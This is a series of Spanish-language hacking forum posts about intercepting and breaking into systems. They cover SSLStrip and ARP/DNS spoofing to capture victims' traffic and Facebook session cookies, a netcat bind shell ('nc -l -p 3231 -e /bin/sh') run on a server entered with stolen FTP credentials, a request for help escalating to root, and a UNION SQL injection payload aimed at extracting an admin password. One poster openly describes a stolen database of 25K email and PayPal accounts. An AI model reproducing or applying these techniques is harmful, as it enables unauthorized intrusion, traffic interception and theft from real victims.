Mensajes

Buenas gente, estoy haciendo unas pruebas de laboratorio con SSLStrip y acabo de ver algo que habia pasado por alto.
Los pasos que todos siguen son:

1 - Habilitar el forwarding
2 - Agregar redireccion en iptables 80 -> 1000 o el puerto q quieran
3 - Iniciar SSLStrip
4 - ARPSpoof

Ahora bien.... funciona barbaro solo cuando el usuario escribre a medias la URL y no pone el https. Estoy probando poner https://gmail.com y el sslstrip no hace magia, la pagina se carga sin problemas por https
Pense q el problema podría ser que no está la redirección en las las iptables, asi que agregué la redireccion del 443 al 1000...pero el resultado fue peor...el firefox me pone conexión interrumpida... y si lo pienso no esta mal...pido https y me da http sin error...algo no va ¿?
Alguien había probado esto ya?... 

Arpspoof solo en LANs...sino dnsspoof!

Te puedo explicar una tecnica super sencilla, si tenes un Linksys remoto al que tenes acceso le podes cambiar el firmware modificado con dnsspoof, configura en el router al que queres robarle el trafico los dns con el ip de este linksys que va a funcionar como server dns... pone el dnsspoof redireccionando las urls q vos quieras a tu maquina... si pones todas a veces se vuelve lento para la victima y para el linksys....y listo podes poner sslstrip wireshark o lo q prefieras para levantar el trafico!!

Si conseguis el IP...y por esas putas casualidades podes llegar a tener acceso al router del flaco...y si tenes suerte de que el router tenga wireless.. podes usar http://samy.pl/mapxss/ para sacar la direccion aproximada a traves de la mac address de la wifi...si es q tenes suerte y eta cargada!

HOla, yo he tratado de escribir varias veces las cookies de facebook en mi firebox y no tuve exito, probe con el cookie editor cargando los datos exactamente como los tome del wireshark y no hubo caso...asi q si tienes suerte comenta!!!!

[nc -l -p 3231 -e /bin/sh 2>&1]

Buenas gente, les cuento que ando haciendo a ver si alguien es mas iluminado y me tira una linea para poder salir del hoyo en el que estoy.
Tengo una base con 25K de mails, varias con cuentas de PP y AlertPay de distintos PTC, entre ellas encontre varias cuentas de FTP. entre en varios de los servidores y estoy tratando de hacer una conexion a mi Backtrack y ahi quiero ver como hacer escalacion de privilegios para hacerme root.
El server donde estoy intentando no me dejo subir la c99 porque tiene algun tipo de chequeo pero puder subir otra shell y estuve revisando todo el server sin encontrar nada que me ayude. En la mayoria de los directorios tengo 755, pero no en todos y menos en los que interesan, tengo la lista de usuarios del server porq puedo leer el /etc/passwd y el /etc/hosts de donde puede ver que la red interna tiene muchos servers.
Bien hasta aca la intro, ahora estoy tratando de ejecutar el netcat para abrir la conexion que supuestamente se ejecuta pero al intentarme conectar desde mi BT me da timeout. La version de netcat que tiene es 0.7.1:

nc -l -p 3231 -e /bin/sh 2>&1

El proceso corre:
ps -ef|grep nc
XXX   17005 17001  0 21:33 ?        00:00:00 nc -l -p 3333 -e /bin/sh
XXX   17420 17416  0 21:34 ?        00:00:00 sh -c nc -l -p 3231 -e /bin/sh 2>&1
XXX   17421 17420  0 21:34 ?        00:00:00 nc -l -p 3231 -e /bin/sh
XXX   20316 20313  0 21:57 ?        00:00:00 sh -c ps -ef|grep nc
XXX   20318 20316  0 21:57 ?        00:00:00 grep nc

Estoy tratando de ver si las iptables me estan filtrando, pero me da un error:
iptables -L 2>&1
iptables v1.4.2: can't initialize iptables table `filter': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.

La salida del uname -a:

Linux XXX 2.6.32.15-grsecPapasito #5 SMP Tue Jun 22 03:21:13 ART 2010 x86_64 Dual Core AMD Opteron(tm) Processor 275 GNU/Linux


Bueno espero q alguien pueda darme una idea de como seguir para poder hacerme root, desde ya gracias gente!!!!

Buenas gente estoy haciendo unas pruebas de sql inyection y no encuentro como hacerlo andar... tengo la certeza de que se puede... pero no puedo hacerlo funcionar!!

El PHP que estoy usando es el siguiente:

Código [Seleccionar] Expandir

<?
$id=$_GET[id];

include("config.php");
include("includes/mysql.php");
$Db1 = new DB_sql;
$Db1->connect($DBHost, $DBDatabase, $DBUser, $DBPassword);

$sql=$Db1->query("SELECT * FROM banners WHERE id='$id'");
$banner=$Db1->fetch_array($sql);
$sql=$Db1->query("UPDATE banners SET clicks=clicks+1 WHERE id='$id'");

$Db1->sql_close();

header("Location: $banner[target]");
exit;
?>

La base tiene varias tablas, el PHP anterior consulta la tabla banners que tiene la siguiente estructura:

Código [Seleccionar] Expandir

CREATE TABLE IF NOT EXISTS `banners` (
  `id` int(11) NOT NULL auto_increment,
  `title` text NOT NULL,
  `size` int(11) NOT NULL default '0',
  `target` text NOT NULL,
  `banner` text NOT NULL,
  `views` int(11) NOT NULL default '0',
  `clicks` int(11) NOT NULL default '0',
  `credits` int(11) NOT NULL default '0',
  `dsub` text NOT NULL,
  `username` varchar(25) NOT NULL default '',
  `pref` varchar(30) NOT NULL default '',
  `forbid_retract` int(11) NOT NULL default '0',
  `daily_limit` int(11) NOT NULL,
  `views_today` int(11) NOT NULL,
  PRIMARY KEY  (`id`),
  KEY `pref` (`pref`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

Mi intencion es hacer un query y obtener la password del usuario "admin" o hacerle un update. La consulta que estoy haciendo busca un id inexistente y despues "trato" de hacer una union:

Código [Seleccionar] Expandir

http://localhost/test.php?id=144440' UNION ALL SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14 from user where '1

Supuestamente debería funcionar pero como hay un SELECT y despues un UPDATE y ambos hacen uso de la misma variable termina dando error y no puedo obtener nada

Código [Seleccionar] Expandir

Database error: Invalid SQL: UPDATE banners SET clicks=clicks+1 WHERE id='144440' UNION ALL SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from user where '1'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION ALL SELECT 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16 from user where '' at line 1)
Session halted.

Como ven el primer SELECT supuestamente lo esta haciendo, pero muero en el UPDATE...

Si alguien me puede poner un poco de luz en el camino se va a agradecer!!!